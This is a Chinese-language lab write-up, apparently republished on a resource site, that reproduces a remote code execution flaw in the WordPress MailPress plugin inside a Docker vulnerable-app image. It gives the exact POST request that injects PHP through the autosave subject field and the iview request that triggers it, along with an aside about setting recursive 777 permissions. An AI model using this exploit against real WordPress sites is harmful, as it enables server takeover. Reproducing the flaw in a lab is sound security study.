WordPress-Mailpress远程代码执行漏洞复现

来自:互联网
时间:2023-10-06
阅读:
免费资源网 - https://freexyz.cn/

插件简介:

MAIlpress是一个比较流行的邮件插件。

插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/

漏洞复现:

漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

Docker镜像地址:

docker pull medicean/vulapps:w_wordpress_2

启动环境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_2

PoC 使用

使用攻击代码触发漏洞

http://你的 IP 地址:端口号/wp-content/plugins/mailpress/mp-includes/action.php

首先访问这个这个链接:

WordPress-Mailpress远程代码执行漏洞复现

抓取上面那个页面的数据包并修改请求方式为post,并且加上如下post请求参数:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

WordPress-Mailpress远程代码执行漏洞复现

返回包里的id记下來

然后访问下面链接:

127.0.0.1:8000/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=6

WordPress-Mailpress远程代码执行漏洞复现

复现成功!!!

修复方式:

及时打上官方补丁

PS:(一开始我是使用自己搭建的Wordpress,然后自己下载插件了按照正常安装流程走【正常流程:下载插件压缩包–>打开后台–>选择插件–>上传压缩包–>选择安装–>安装】,但是我出现了如下几个问题:1:上传文件大小限制(修改php.ini文件中的上传文件大小限制)2:目录读写的问题(给wordpress所在的目录的父母了递归777权限)3:上传成功,开始安装后出现输入FTP账号密码(到这我没弄了),4:我解压插件压缩包后,直接放到wordpress的插件文件内,刷新页面后,点击激活该插件时,出现一堆错误。我就放弃了,使用docker一键搭建。所以我推荐使用docker,没事儿多玩玩docker!!!)

免费资源网 - https://freexyz.cn/
返回顶部
顶部